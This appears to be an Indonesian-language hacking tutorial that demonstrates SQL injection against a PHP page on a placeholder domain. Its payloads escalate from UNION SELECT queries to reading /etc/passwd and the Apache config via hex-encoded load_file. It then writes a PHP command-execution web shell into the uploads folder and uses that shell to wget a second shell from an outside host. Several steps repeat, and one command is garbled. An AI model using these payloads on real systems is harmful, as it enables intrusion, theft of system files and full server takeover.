target
https://www.target.com/ajax_city_all_branch.php?state=PANAJI
https://www.target.com/ajax_city_all_branch.php?state=PANAJI
kasih tanda petik
https://www.target.com/ajax_city_all_branch.php?state=PANAJI'
https://www.target.com/ajax_city_all_branch.php?state=PANAJI'
error sqli, gunakan perintah order by 2--
sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' order by 1--+
sudah tidak error
sekarang gunakan https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select 1--+
liat user nya
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select user()--+
nahh root
syarat melakukan ini ada 2
For creating any file on the website with SQL queries two things are most important
:)
1) Root Path ( We have it by ERROR :) )
2) File Privilages for the Current MySQl User :D we have File Privilages as well :D
selanjutnya
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah
nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya :D
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+
sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt
"wine ganteng" nya di ubah ke hex yah :D
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt
"wine ganteng" nya di ubah ke hex yah :D
Coba sekarang kita masukan ini buat mendonwload bekdor :P
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -
Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php
terus buka dah
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php
terus buka dah
sekian dan terima kasih :D
gretz to ch3rn0by1 | tr0jan | G_26 and you
